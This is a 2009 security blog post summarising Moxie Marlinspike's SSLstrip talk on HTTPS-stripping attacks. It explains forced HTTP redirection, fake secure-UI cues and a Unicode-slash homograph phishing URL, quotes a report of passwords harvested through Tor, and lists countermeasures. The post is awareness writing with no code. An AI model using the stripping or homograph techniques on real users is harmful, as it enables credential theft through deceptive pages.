Monday

SSLstrip tool and the HTTPS stripping attack from Blackhat DC 2009



The talk from Blackhat DC 2009 that got the most media coverage was probably : "New techniques for defeating SSL/TLS from Moxie Marlinspike.

If you want a good detailed breakdown of the talk, I suggest Dan Kaminky's post on doxpara.com.

Summarised: it involves forced redirections, “secure UI” simulation and a smart homograph trick which makes the final attacker-controlled page look identical and as secure as the original.
Basically mixing https pages with http was never a good idea. Linkedin is the first example that springs into mind. And it isn't just a theoretical attack. From TheRegister:

To prove his point, he [Marlinspike] ran sslstrip on a server hosting a Tor anonymous browsing network. During a 24-hour period, he harvested 254 passwords from users visiting sites including Yahoo, Gmail, Ticketmaster, PayPal, and LinkedIn. The users were fooled even though SSLstrip wasn’t using the proxy feature that tricks them into believing they were at a secure site. Sadly, the Tor users entered passwords even though the addresses in their address bars didn’t display the crucial “https.”

So using the homograph trick, you can looking at a “secure” page from an address (in the location bar) like https://www.paypal.com╱login╱abcdef.xyz123.cn. This appears to be a legitimate Paypal login page, but in reality is an evil phishing bait from the xyz.cn Chinese domain. The “╱” character is not a true slash, but a different unicode character looking like (homograph of) a slash and valid as an IDN subdomain part. Scary, isn't it?

Have a look at the original presentation slides and the video of the talk.

There aren't much countermeasures against this attack. Some are asking for more EV certificates. Moxie says to encrypt everything. As a end user, you could use the force to HTTPS feature of NoScript. These can all help to better secure our traffic but there isn't an "one size fits all" solution.

Since this evening, his tool sslstrip is directly available from his website.

To finish this post, a last bonus: an interview from Dark Tanget and Moxie Marlinspike (warning the audio isn't that good.

(Photo under creative commons from bpedro's photostream)

Posted by Security4all at 23.2.09

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)